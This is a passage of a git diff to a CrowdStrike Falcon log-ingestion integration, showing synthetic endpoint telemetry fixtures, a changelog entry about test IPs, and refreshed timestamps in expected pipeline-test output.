egKeySecurityDecreasedCount":"0","RemovableDiskFileWrittenCount":"0","RunDllInvocationCount":"0","SHA256HashData":"87419b84f34cdb13f699c0f0803c957e48c27ad83334fcad7bac9ad89c0a466f","ScreenshotsTakenCount":"0","ScriptEngineInvocationCount":"0","ServiceEventCount":"0","SetThreadContextCount":"0","SnapshotFileOpenCount":"0","SuspectStackCount":"0","SuspiciousCredentialModuleLoadCount":"0","SuspiciousDnsRequestCount":"0","SuspiciousFontLoadCount":"0","SuspiciousRawDiskReadCount":"0","TargetProcessId":"1741732942772","UnsignedModuleLoadCount":"0","UserMemoryAllocateExecutableCount":"0","UserMemoryAllocateExecutableRemoteCount":"0","UserMemoryProtectExecutableCount":"0","UserMemoryProtectExecutableRemoteCount":"0","UserSid":"S-1-12-1-1647509123-1308660782-3901357462-3999411581","UserTime":"781250","aid":"fffffffffdab492a5a20cd0417395a73","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"EndOfProcess","id":"ffffffff-1111-11eb-b685-0241eaddc553","name":"EndOfProcessV14","timestamp":"1604855276657"} +{"AuthenticationId":"895027","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3338885535","ContextProcessId":"1786917081743","ContextThreadId":"31685015444484","ContextTimeStamp":"1604855317.892","EffectiveTransmissionClass":"3","Entitlements":"15","FileEcpBitmask":"0","FileIdentifier":"0000000000000000be341bb58bc5f1f2a24339010200510e","FileObject":"18446636933702558240","IrpFlags":"1028","IsOnNetwork":"1","IsOnRemovableDisk":"0","MajorFunction":"18","MinorFunction":"0","OperationFlags":"0","Size":"223989","TargetFileName":"\\Device\\Mup\\intranet.dev\\int\\Test.pptx","TokenType":"1","aid":"fffffffffa474d216472f3edb73c75ed","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"OoxmlFileWritten","id":"ffffffff-1111-11eb-9165-067ee18a7975","name":"OoxmlFileWrittenV11","timestamp":"1604855329571"} +{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3765958535","ConnectionDirection":"2","ConnectionFlags":"0","ContextProcessId":"439029805661","ContextThreadId":"273683743193497","ContextTimeStamp":"1604855351.158","EffectiveTransmissionClass":"3","Entitlements":"15","InContext":"0","LocalAddressIP6":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6","LocalPort":"50373","Protocol":"6","RemoteAddressIP6":"0:0:0:0:0:0:0:0","RemotePort":"0","aid":"ffffffff1f924e228a807ea4c0f21b0b","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"NetworkListenIP6","id":"ffffffff-1111-11eb-85f5-02ab029194b9","name":"NetworkListenIP6V5","timestamp":"1604855351798"} +{"ConfigBuild":"1007.4.0011104.1","ConfigStateHash":"1457965279","ContextProcessId":"321365562189152025","ContextThreadId":"0","ContextTimeStamp":"1604846070.744","Entitlements":"15","SHA256HashData":"e1bed7598ffdecf63a4d240f8309b528fc45068c6cb8137a5090f3afeb57f29d","Size":"29646","TargetFileName":"/System/Library/CoreServices/SecurityAgentPlugins/HomeDirMechanism.bundle/Contents/MacOS/HomeDirMechanism/..namedfork/rsrc","VnodeModificationType":"10","aid":"ffffffff1f32487185fcde66a9dc0528","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"AsepFileChange","id":"ffffffff-1111-11eb-b9b4-063e98f9b19b","name":"AsepFileChangeMacV2","timestamp":"1604855355495"} +{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3011122681","ContextProcessId":"2932136","ContextThreadId":"36157339485804","ContextTimeStamp":"1604855191.803","EffectiveTransmissionClass":"2","Entitlements":"15","LogonTime":"","PasswordLastSet":"","UserLogonFlags":"1","UserName":"user7","UserSid":"S-1-5-10","aid":"ffffffffa5bd4efaa195a7132c576edc","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"UserLogonFailed","id":"ffffffff-1111-11eb-aa5a-0207e26418af","name":"UserLogonFailedV1","timestamp":"1604855193422"} +{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"1858880895","ConnectionDirection":"0","ConnectionFlags":"0","ContextProcessId":"56042872298","ContextTimeStamp":"1604855136.669","EffectiveTransmissionClass":"3","Entitlements":"15","InContext":"0","LocalAddressIP6":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6","LocalPort":"49689","Protocol":"6","RemoteAddressIP6":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6","RemotePort":"443","aid":"ffffffff6854438eb4181691ec47e43d","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"NetworkConnectIP6","id":"ffffffff-1111-11eb-a889-061944805289","name":"NetworkConnectIP6V5","timestamp":"1604855199798"} +{"ConfigBuild":"1007.4.0011104.1","ConfigStateHash":"1789338890","ContextProcessId":"321382909294815631","ContextThreadId":"0","ContextTimeStamp":"1604853755.987","Entitlements":"15","SHA256HashData":"fa07e991e0c3f3661794bba39061433265162b10cd9036751941cc45e6a4b583","Size":"165","SourceFileName":"/Library/Application Support/JAMF/tmp/.dat.nosync2c98.VBwjsq","TargetFileName":"/Library/Application Support/JAMF/tmp/6B24D2B6-BC17-4470-8078-91A787A19478","aid":"ffffffffc07b49d6b7426e970523671a","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"NewExecutableRenamed","id":"ffffffff-1111-11eb-8773-06939a2f0915","name":"NewExecutableRenamedMacV1","timestamp":"1604855213224"} +{"ConfigBuild":"1007.4.0011104.1","ConfigStateHash":"203564169","ConnectionDirection":"0","ConnectionFlags":"0","ContextProcessId":"321367236803434269","ContextTimeStamp":"1604855268.323","Entitlements":"15","InContext":"0","LocalAddressIP6":"0:0:0:0:0:0:0:0","LocalPort":"51076","Protocol":"6","RemoteAddressIP6":"0:0:0:0:0:0:0:0","RemotePort":"0","aid":"ffffffffa60a47af4ebd2a76070f0d4f","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"NetworkListenIP6","id":"ffffffff-1111-11eb-9a50-0669ff09604d","name":"NetworkListenIP6MacV5","timestamp":"1604855268755"} +{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3765958535","ContextProcessId":"1611521722601","ContextThreadId":"53405065993811","ContextTimeStamp":"1604855280.307","DomainName":"raw.githubusercontent.com","DualRequest":"0","EffectiveTransmissionClass":"3","Entitlements":"15","InterfaceIndex":"0","RequestType":"1","aid":"ffffffff6d724d38af99c628fb904626","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"SuspiciousDnsRequest","id":"ffffffff-1111-11eb-885e-02ac336efd4b","name":"SuspiciousDnsRequestV2","timestamp":"1604855323217"} +{"ConfigBuild":"100.3.0011603.1","ContextProcessId":"4492535979973","ContextThreadId":"14023068415125","ContextTimeStamp":"1604855315.034","DiskParentDeviceInstanceId":"PCI\\VEN_8086\u0026DEV_31E3\u0026SUBSYS_080C1028\u0026REV_03\\3\u002611583659\u00260\u002690","EffectiveTransmissionClass":"3","Entitlements":"15","VolumeDeviceCharacteristics":"131072","VolumeDeviceObjectFlags":"134479872","VolumeDeviceType":"8","VolumeDriveLetter":"C:","VolumeFileSystemDevice":"\\Ntfs","VolumeFileSystemDriver":"\\FileSystem\\Ntfs","VolumeFileSystemType":"2","VolumeIsEncrypted":"0","VolumeMountPoint":"\\??\\Volume{9b46da3f-ce44-432f-9230-c9201504bfd7}","VolumeName":"\\Device\\HarddiskVolume4","VolumeRealDeviceName":"\\Device\\HarddiskVolume4","VolumeSectorSize":"512","aid":"ffffffff1990483499a736373600eef7","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"FsVolumeMounted","id":"ffffffff-1111-11eb-9be9-024459b713c5","name":"FsVolumeMountedV6","timestamp":"1604855329102"} +{"ConfigBuild":"1007.4.0011104.1","ConfigStateHash":"1789338890","ConnectionDirection":"0","ConnectionFlags":"0","ContextProcessId":"321210562584146513","ContextTimeStamp":"1604855127.011","Entitlements":"15","InContext":"0","LocalAddressIP4":"127.0.0.1","LocalPort":"53","Protocol":"6","RemoteAddressIP4":"0.0.0.0","RemotePort":"0","aid":"ffffffffe5ff467b4f0c4fd41a4462bb","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"NetworkListenIP4","id":"ffffffff-1111-11eb-ae74-065212970c5d","name":"NetworkListenIP4MacV5","timestamp":"1604855128936"} +{"AuthenticationId":"999","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3338885535","ContextTimeStamp":"1604855185.108","EffectiveTransmissionClass":"3","Entitlements":"15","ImageFileName":"\\Device\\HarddiskVolume1\\Windows\\System32\\gpsvc.dll","InterfaceGuid":"367ABB81-9844-35F1-AD32-98F038001003","InterfaceVersion":"131072","RpcClientProcessId":"219053851298","RpcClientThreadId":"22047924482692","RpcNestingLevel":"0","RpcOpNum":"19","ServiceDisplayName":"gpsvc","TargetProcessId":"224116976578","TargetThreadId":"22920092479704","TokenType":"1","UserName":"user7","aid":"ffffffff59514ea68b4693ddfb9b6643","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"HostedServiceStarted","id":"ffffffff-1111-11eb-860c-0606af112d55","name":"HostedServiceStartedV2","timestamp":"1604855184068"} +{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3338885535","ContextTimeStamp":"1604855299.018","EffectiveTransmissionClass":"3","Entitlements":"15","ServiceDisplayName":"wuauserv","TargetProcessId":"661455186053","TargetThreadId":"24238019995551","aid":"ffffffff2b5a4bf5afc6682595faa016","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"HostedServiceStopped","id":"ffffffff-1111-11eb-9b11-0602a5689467","name":"HostedServiceStoppedV1","timestamp":"1604855302512"} +{"AuthenticationId":"3443175","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3338885535","ContextProcessId":"1091372257857","ContextThreadId":"36855848099771","ContextTimeStamp":"1604855227.625","DiskParentDeviceInstanceId":"PCI\\VEN_1179\u0026DEV_0113\u0026SUBSYS_00011179\u0026REV_01\\4\u00263ad42678\u00260\u002600E0","EffectiveTransmissionClass":"3","Entitlements":"15","FileEcpBitmask":"0","FileIdentifier":"f5ce07c6af67ec4ebe0846ff200bfc2f54f7020000002100","FileObject":"18446603341701082336","IrpFlags":"1028","IsOnNetwork":"0","IsOnRemovableDisk":"0","MajorFunction":"18","MinorFunction":"0","OperationFlags":"0","Size":"288041","TargetFileName":"\\Device\\HarddiskVolume3\\Users\\user12\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\TempState\\Downloads\\ex.pdf.8e41hf8.partial","TokenType":"1","aid":"ffffffff32cb4abc50bc133b31a69946","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"PdfFileWritten","id":"ffffffff-1111-11eb-baea-02dccfbb7779","name":"PdfFileWrittenV11","timestamp":"1604855264313"} +{"AuthenticationId":"3783389","CommandLine":"\"C:\\WINDOWS\\system32\\backgroundTaskHost.exe\" -ServerName:App.AppXnme9zjyebb2xnyygh6q9ev6p5d234br2.mca","ConfigBuild":"1007.3.0012309.1","ConfigStateHash":"3998263252","EffectiveTransmissionClass":"3","Entitlements":"15","ImageFileName":"\\Device\\HarddiskVolume3\\Windows\\System32\\backgroundTaskHost.exe","ImageSubsystem":"2","IntegrityLevel":"4096","MD5HashData":"50d5fd1290d94d46acca0585311e74d5","ParentAuthenticationId":"3783389","ParentBaseFileName":"svchost.exe","ParentProcessId":"2439558094566","ProcessCreateFlags":"525332","ProcessEndTime":"","ProcessParameterFlags":"16385","ProcessStartTime":"1604855181.648","ProcessSxsFlags":"1600","RawProcessId":"22272","RpcClientProcessId":"2439558094566","SHA1HashData":"0000000000000000000000000000000000000000","SHA256HashData":"b8e176fe76a1454a00c4af0f8bf8870650d9c33d3e333239a59445c5b35c9a37","SessionId":"1","SourceProcessId":"2439558094566","SourceThreadId":"77538684027214","Tags":"41, 12094627905582, 12094627906234","TargetProcessId":"2450046082233","TokenType":"2","UserSid":"S-1-12-1-3697283754-1083485977-2164330645-2516515886","WindowFlags":"128","aid":"ffffffff655344736aca58d17fb570f0","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"ProcessRollup2","id":"ffffffff-1111-11eb-8462-02ade3b2f949","name":"ProcessRollup2V18","timestamp":"1604855182022"} +{"AuthenticationId":"326190744","AuthenticationUuid":"98467113-C771-4845-B71B-89B3CE9F93C9","AuthenticationUuidAsString":"13714698-71C7-4548-B71B-89B3CE9F93C9","ConfigBuild":"1007.4.0011104.1","ConfigStateHash":"1457965279","Entitlements":"15","UID":"326190744","UserPrincipal":"user8@dom6","UserSid":"S-1-5-21-3629339319-2376021926-2724479216-652382488","aid":"ffffffff1f32487185fcde66a9dc0528","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"UserIdentity","id":"ffffffff-1111-11eb-b9b4-063e98f9b19b","name":"UserIdentityMacV2","timestamp":"1604855355388"} +{"BootArgs":" NOEXECUTE=OPTIN HYPERVISORLAUNCHTYPE=AUTO FVEBOOT=2125824 NOVGA","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"1874387338","EffectiveTransmissionClass":"0","Entitlements":"15","MachineDomain":"","aid":"ffffffffcdb543135e7fcdf8e5a8fbdb","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"HostInfo","id":"ffffffff-1111-11eb-9bbd-061290dcd983","name":"HostInfoV2","timestamp":"1604855157555"} +{"AuthenticationId":"703298","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"2642284486","ContextProcessId":"1161025471861","ContextThreadId":"34929528116709","ContextTimeStamp":"1604851030.593","DiskParentDeviceInstanceId":"USB\\VID_1058\u0026PID_2621\\57583431453939315A4C5255","EffectiveTransmissionClass":"3","Entitlements":"15","FileEcpBitmask":"0","FileIdentifier":"262fbc677256cf4c8d6c6a227285a072c06830873b000000","FileObject":"18446664963104449168","IrpFlags":"1028","IsOnNetwork":"0","IsOnRemovableDisk":"1","MajorFunction":"18","MinorFunction":"0","OperationFlags":"0","Size":"517029","TargetFileName":"\\Device\\HarddiskVolume5\\01.png.tmp$$","TokenType":"1","UserName":"user9","aid":"ffffffff16bf4c7bb5ad755a4722025c","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"GenericFileWritten","id":"ffffffff-1111-11eb-800a-06cecfd73923","name":"GenericFileWrittenV11","timestamp":"1604851031298"} +{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"666346415","ContextProcessId":"1717987648455","ContextThreadId":"55064470042288","ContextTimeStamp":"1604850899.164","EffectiveTransmissionClass":"3","Entitlements":"15","VolumeName":"\\Device\\HarddiskVolume27","aid":"ffffffff896b43725b83c79aa79959da","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"FsVolumeUnmounted","id":"ffffffff-1111-11eb-9f70-0634389d9ea9","name":"FsVolumeUnmountedV2","timestamp":"1604850899812"} +{"ConfigBuild":"1007.4.0009906.1","ConfigStateHash":"3429017943","ContextProcessId":"66426035996442255","ContextTimeStamp":"1604851098.548","Entitlements":"15","aid":"ffffffff899541b94b9adff8922aa70a","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"FirewallDisabled","id":"ffffffff-1111-11eb-9d4c-02f402df8c1f","name":"FirewallDisabledMacV1","timestamp":"1604851040625"} diff --git a/packages/crowdstrike/changelog.yml b/packages/crowdstrike/changelog.yml index 6ad6e921c88..72164b30d22 100644 --- a/packages/crowdstrike/changelog.yml +++ b/packages/crowdstrike/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.1.1" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "1.1.0" changes: - description: Add 8.0.0 version constraint diff --git a/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-falcon-audit-events.log-expected.json b/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-falcon-audit-events.log-expected.json index 572c5e41a08..06abc84c8fa 100644 --- a/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-falcon-audit-events.log-expected.json +++ b/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-falcon-audit-events.log-expected.json @@ -17,7 +17,7 @@ "name": "hostnameofmachine" }, "event": { - "ingested": "2021-07-01T08:21:45.216582900Z", + "ingested": "2021-12-09T13:36:08.382628100Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"offset\": 1045,\n \"eventType\": \"RemoteResponseSessionStartEvent\",\n \"eventCreationTime\": 1582830734000,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"SessionId\": \"6020260b-0398-4d41-999d-5531b55522de\",\n \"HostnameField\": \"hostnameofmachine\",\n \"UserName\": \"first.last@company.com\",\n \"StartTimestamp\": 1582830734\n }\n}", "kind": "event", "action": [ @@ -73,7 +73,7 @@ "name": "hostnameofmachine" }, "event": { - "ingested": "2021-07-01T08:21:45.216593900Z", + "ingested": "2021-12-09T13:36:08.382637400Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"offset\": 1046,\n \"eventType\": \"RemoteResponseSessionEndEvent\",\n \"eventCreationTime\": 1582830772000,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"SessionId\": \"6020260b-0398-4d41-999d-5531b55522de\",\n \"HostnameField\": \"hostnameofmachine\",\n \"UserName\": \"first.last@company.com\",\n \"EndTimestamp\": 1582830772\n }\n}", "kind": "event", "action": [ @@ -134,7 +134,7 @@ ] }, "event": { - "ingested": "2021-07-01T08:21:45.216601800Z", + "ingested": "2021-12-09T13:36:08.382641600Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"offset\": 0,\n \"eventType\": \"AuthActivityAuditEvent\",\n \"eventCreationTime\": 1581542950710,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"UserId\": \"api-client-id:1234567890abcdefghijklmnopqrstuvwxyz\",\n \"UserIp\": \"10.10.0.8\",\n \"OperationName\": \"streamStarted\",\n \"ServiceName\": \"Crowdstrike Streaming API\",\n \"Success\": true,\n \"UTCTimestamp\": 1581542950,\n \"AuditKeyValues\": [\n {\n \"Key\": \"APIClientID\",\n \"ValueString\": \"1234567890abcdefghijklmnopqr\"\n },\n {\n \"Key\": \"partition\",\n \"ValueString\": \"0\"\n },\n {\n \"Key\": \"offset\",\n \"ValueString\": \"-1\"\n },\n {\n \"Key\": \"appId\",\n \"ValueString\": \"siem-connector-v2.0.0\"\n },\n {\n \"Key\": \"eventType\",\n \"ValueString\": \"[UserActivityAuditEvent HashSpreadingEvent RemoteResponseSessionStartEvent RemoteResponseSessionEndEvent DetectionSummaryEvent AuthActivityAuditEvent]\"\n }\n ]\n }\n}", "category": [ "authentication" @@ -210,7 +210,7 @@ ] }, "event": { - "ingested": "2021-07-01T08:21:45.216631400Z", + "ingested": "2021-12-09T13:36:08.382646400Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"offset\": 1,\n \"eventType\": \"AuthActivityAuditEvent\",\n \"eventCreationTime\": 1581543577147,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"UserId\": \"alice@company.com\",\n \"UserIp\": \"192.168.6.8\",\n \"OperationName\": \"twoFactorAuthenticate\",\n \"ServiceName\": \"CrowdStrike Authentication\",\n \"Success\": true,\n \"UTCTimestamp\": 1581543577147\n }\n}", "category": [ "authentication" @@ -265,7 +265,7 @@ ] }, "event": { - "ingested": "2021-07-01T08:21:45.216635Z", + "ingested": "2021-12-09T13:36:08.382651900Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"offset\": 2,\n \"eventType\": \"AuthActivityAuditEvent\",\n \"eventCreationTime\": 1581545677554,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"UserId\": \"bob@company.com\",\n \"UserIp\": \"192.168.6.3\",\n \"OperationName\": \"twoFactorAuthenticate\",\n \"ServiceName\": \"CrowdStrike Authentication\",\n \"Success\": true,\n \"UTCTimestamp\": 1581545677554\n }\n}", "category": [ "authentication" @@ -315,7 +315,7 @@ "ip": "192.168.6.13" }, "event": { - "ingested": "2021-07-01T08:21:45.216640600Z", + "ingested": "2021-12-09T13:36:08.382656900Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"offset\": 3,\n \"eventType\": \"UserActivityAuditEvent\",\n \"eventCreationTime\": 1581546248000,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"UserId\": \"chris@company.com\",\n \"UserIp\": \"192.168.6.13\",\n \"OperationName\": \"update_group\",\n \"ServiceName\": \"groups\",\n \"AuditKeyValues\": [\n {\n \"Key\": \"group_id\",\n \"ValueString\": \"3c80ce30b9654cb4bd15beec6a517e65\"\n },\n {\n \"Key\": \"action_name\",\n \"ValueString\": \"add_group_member\"\n }\n ],\n \"UTCTimestamp\": 1581546248\n }\n}", "kind": "event", "action": "user_activity_audit_event", @@ -384,7 +384,7 @@ ] }, "event": { - "ingested": "2021-07-01T08:21:45.216646100Z", + "ingested": "2021-12-09T13:36:08.382662800Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"offset\": 4,\n \"eventType\": \"AuthActivityAuditEvent\",\n \"eventCreationTime\": 1581601312140,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"UserId\": \"alice@company.com\",\n \"UserIp\": \"192.168.6.8\",\n \"OperationName\": \"requestResetPassword\",\n \"ServiceName\": \"CrowdStrike Authentication\",\n \"Success\": true,\n \"UTCTimestamp\": 1581601312140,\n \"AuditKeyValues\": [\n {\n \"Key\": \"target_name\",\n \"ValueString\": \"alice@company.com\"\n }\n ]\n }\n}", "category": [ "authentication" @@ -445,7 +445,7 @@ ] }, "event": { - "ingested": "2021-07-01T08:21:45.216650700Z", + "ingested": "2021-12-09T13:36:08.382667Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"offset\": 5,\n \"eventType\": \"AuthActivityAuditEvent\",\n \"eventCreationTime\": 1581601341730,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"UserId\": \"alice@company.com\",\n \"UserIp\": \"192.168.6.8\",\n \"OperationName\": \"twoFactorAuthenticate\",\n \"ServiceName\": \"CrowdStrike Authentication\",\n \"Success\": true,\n \"UTCTimestamp\": 1581601341730\n }\n}", "category": [ "authentication" @@ -500,7 +500,7 @@ ] }, "event": { - "ingested": "2021-07-01T08:21:45.216670700Z", + "ingested": "2021-12-09T13:36:08.382671300Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"offset\": 6,\n \"eventType\": \"AuthActivityAuditEvent\",\n \"eventCreationTime\": 1581601520236,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"UserId\": \"alice@company.com\",\n \"UserIp\": \"192.168.6.8\",\n \"OperationName\": \"changePassword\",\n \"ServiceName\": \"CrowdStrike Authentication\",\n \"Success\": true,\n \"UTCTimestamp\": 1581601520236,\n \"AuditKeyValues\": [\n {\n \"Key\": \"target_name\",\n \"ValueString\": \"first.last@company.com\"\n }\n ]\n }\n}", "category": [ "authentication" @@ -561,7 +561,7 @@ ] }, "event": { - "ingested": "2021-07-01T08:21:45.216674800Z", + "ingested": "2021-12-09T13:36:08.382674800Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"offset\": 7,\n \"eventType\": \"AuthActivityAuditEvent\",\n \"eventCreationTime\": 1581601572362,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"UserId\": \"alice@company.com\",\n \"UserIp\": \"192.168.6.8\",\n \"OperationName\": \"userAuthenticate\",\n \"ServiceName\": \"CrowdStrike Authentication\",\n \"Success\": true,\n \"UTCTimestamp\": 1581601572362\n }\n}", "category": [ "authentication" @@ -616,7 +616,7 @@ ] }, "event": { - "ingested": "2021-07-01T08:21:45.216680300Z", + "ingested": "2021-12-09T13:36:08.382679300Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"offset\": 8,\n \"eventType\": \"AuthActivityAuditEvent\",\n \"eventCreationTime\": 1581601814754,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"UserId\": \"alice@company.com\",\n \"UserIp\": \"192.168.6.8\",\n \"OperationName\": \"twoFactorAuthenticate\",\n \"ServiceName\": \"CrowdStrike Authentication\",\n \"Success\": true,\n \"UTCTimestamp\": 1581601814754\n }\n}", "category": [ "authentication" @@ -671,7 +671,7 @@ ] }, "event": { - "ingested": "2021-07-01T08:21:45.216688600Z", + "ingested": "2021-12-09T13:36:08.382685300Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"offset\": 9,\n \"eventType\": \"AuthActivityAuditEvent\",\n \"eventCreationTime\": 1581601820289,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"UserId\": \"alice@company.com\",\n \"UserIp\": \"192.168.6.8\",\n \"OperationName\": \"selfAcceptEula\",\n \"ServiceName\": \"CrowdStrike Authentication\",\n \"Success\": true,\n \"UTCTimestamp\": 1581601820289\n }\n}", "category": [ "authentication" @@ -721,7 +721,7 @@ "ip": "192.168.6.8" }, "event": { - "ingested": "2021-07-01T08:21:45.216696500Z", + "ingested": "2021-12-09T13:36:08.382690900Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"offset\": 10,\n \"eventType\": \"UserActivityAuditEvent\",\n \"eventCreationTime\": 1581603262000,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"UserId\": \"alice@company.com\",\n \"UserIp\": \"192.168.6.8\",\n \"OperationName\": \"detection_update\",\n \"ServiceName\": \"detections\",\n \"AuditKeyValues\": [\n {\n \"Key\": \"detection_id\",\n \"ValueString\": \"ldt:5a6fd0b7347440cd74cb84855a8aee18:17180539745\"\n },\n {\n \"Key\": \"new_state\",\n \"ValueString\": \"in_progress\"\n },\n {\n \"Key\": \"assigned_to\",\n \"ValueString\": \"First Last\"\n },\n {\n \"Key\": \"assigned_to_uid\",\n \"ValueString\": \"first.last@company.com\"\n }\n ],\n \"UTCTimestamp\": 1581603262\n }\n}", "kind": "event", "action": "user_activity_audit_event", diff --git a/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-falcon-events.log-expected.json b/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-falcon-events.log-expected.json index e42ac3aec43..6be007be91c 100644 --- a/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-falcon-events.log-expected.json +++ b/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-falcon-events.log-expected.json @@ -62,7 +62,7 @@ }, "event": { "severity": 4, - "ingested": "2021-07-01T08:21:45.615781200Z", + "ingested": "2021-12-09T13:36:09.420125Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"offset\": 294564,\n \"eventType\": \"DetectionSummaryEvent\",\n \"eventCreationTime\": 1582101000000,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"ProcessStartTime\": 1536846339,\n \"ProcessEndTime\": 0,\n \"ProcessId\": 38684386611,\n \"ParentProcessId\": 38682494050,\n \"ComputerName\": \"alice-laptop\",\n \"UserName\": \"alice\",\n \"DetectName\": \"Process Terminated\",\n \"DetectDescription\": \"Terminated a process related to the deletion of backups, which is often indicative of ransomware activity.\",\n \"Severity\": 4,\n \"SeverityName\": \"High\",\n \"FileName\": \"explorer.exe\",\n \"FilePath\": \"\\\\Device\\\\HarddiskVolume1\\\\Windows\",\n \"CommandLine\": \"C:\\\\Windows\\\\Explorer.EXE\",\n \"SHA256String\": \"6a671b92a69755de6fd063fcbe4ba926d83b49f78c42dbaeed8cdb6bbc57576a\",\n \"MD5String\": \"ac4c51eb24aa95b77f705ab159189e24\",\n \"MachineDomain\": \"CORP-DOMAIN\",\n \"FalconHostLink\": \"https://falcon.crowdstrike.com/ec86abd353824e96765ecbe18eb4f0b4\",\n \"SensorId\": \"7c808b4c8878433287eea53d4a8c3268\",\n \"DetectId\": \"ldt:ec86abd353824e96765ecbe18eb4f0b4:38655257584\",\n \"LocalIP\": \"192.168.12.51\",\n \"MACAddress\": \"00-00-00-11-22-33\",\n \"Tactic\": \"Malware\",\n \"Technique\": \"Ransomware\",\n \"Objective\": \"Falcon Detection Method\",\n \"PatternDispositionDescription\": \"Prevention, process killed.\",\n \"PatternDispositionValue\": 16,\n \"PatternDispositionFlags\": {\n \"Indicator\": false,\n 